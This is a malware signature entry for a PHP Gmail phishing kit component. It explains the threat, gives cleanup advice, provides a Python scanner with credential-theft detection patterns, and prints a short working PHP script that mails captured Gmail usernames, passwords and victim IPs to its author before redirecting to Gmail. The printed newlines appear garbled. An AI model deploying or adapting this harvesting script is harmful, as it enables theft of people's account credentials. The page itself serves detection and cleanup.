Malware Signatures

php.phishing.gmail.001

Phishing is a way to illegally acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication (website, email, etc.). These fake websites are hosted on compromised sites without the owner's permission and are sent to victims by mailing scripts, which may or may not be hosted on the same server as the phishing page.
Phishing pages are often complex and rely on several files to run. They are hosted in a specific directory whose name resembles the phishing target.
PHP phishing tools are malware accomplices, mostly used to send the captured credentials and perform the final actions, such as redirecting to the legitimate page or even closing the browser window.
This tool sends the user's stolen credentials to the author's e-mail address, then redirects the user to the legitimate Gmail page.

Affecting

Any website running vulnerable software or hosted on a server with compromised access credentials

Cleanup

Inspect your site's files and directories for strange names, or names that resemble sites other than yours, and delete them.
Reviewing your site's access logs for unusual POST requests is a good way to find out whether your site is infected and where the malicious code is hosted.
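
One way to automate the file inspection described above, as an added example that is not part of the original signature page: it flags PHP files that combine the three traits visible in the dump (credential fields read from `$_POST`, a `mail()` call, and a redirect to another host). The regexes, function names and sample strings are assumptions of this example.

```python
import re
import sys
from pathlib import Path

# Traits of the dump on this page; the regexes and names are this example's assumptions.
CRED_POST = re.compile(
    r"\$_POST\s*\[\s*['\"](?:user(?:name)?|login|pass(?:wd|word)?|pwd)['\"]\s*\]", re.I)
MAIL_CALL = re.compile(r"(?<![\w$>:])mail\s*\(", re.I)
REDIRECT = re.compile(r"header\s*\(\s*['\"]Location:\s*https?://([^/'\"\s]+)", re.I)

# Constructed samples: a trimmed credential mailer and an ordinary contact form.
SAMPLE_SUSPECT = """<? $m = "Password: ".$_POST['Passwd'];
if (mail($to, $subj, $m, $hdrs)) { header("Location: https://gmail.com"); } ?>"""
SAMPLE_BENIGN = """<?php mail($admin, "Contact", $_POST['message']);
header("Location: https://example.org/thanks"); ?>"""


def score_php(source, own_hosts=()):
    """Return the names of the traits present in one PHP source string."""
    own = {h.lower() for h in own_hosts}
    hits = set()
    if CRED_POST.search(source):
        hits.add("credential_post")
    if MAIL_CALL.search(source):
        hits.add("mail_call")
    # A redirect back to the site itself is normal after a form post.
    if any(host.lower() not in own for host in REDIRECT.findall(source)):
        hits.add("offsite_redirect")
    return hits


def scan_tree(root, own_hosts=(), threshold=3):
    """List (path, traits) for PHP files under root showing >= threshold traits."""
    findings = []
    for path in sorted(Path(root).rglob("*.php")):
        hits = score_php(path.read_text(errors="replace"), own_hosts)
        if len(hits) >= threshold:
            findings.append((str(path), sorted(hits)))
    return findings


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, hits in scan_tree(root, own_hosts=sys.argv[2:]):
        print(f"{path}: {', '.join(hits)}")
```

Run it with the web root as the first argument and the site's own host names after it; a match is a lead for manual review, not proof of infection.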

Dump


<?

$ip = getenv("REMOTE_ADDR");
$message .= "--------------Created By Raad------------------------------n";
$message .= "Username: ".$_POST['Username']."n";
$message .= "Password: ".$_POST['Passwd']."n";
$message .= "IP: ".$ip."n";
$message .= "---------------Created By Raad------------------------------n";

$recipient = "email @ address";
$subject = "Sheedo$";
$headers = "From: Blog";
$headers .= $_POST['email @ address ']."n";
$headers .= "MIME-Version: 1.0n";
if (mail($recipient,$subject,$message,$headers))
{
header("Location: https://gmail.com");

}
else
{
echo "ERROR! Please go back and try again.";
}

?>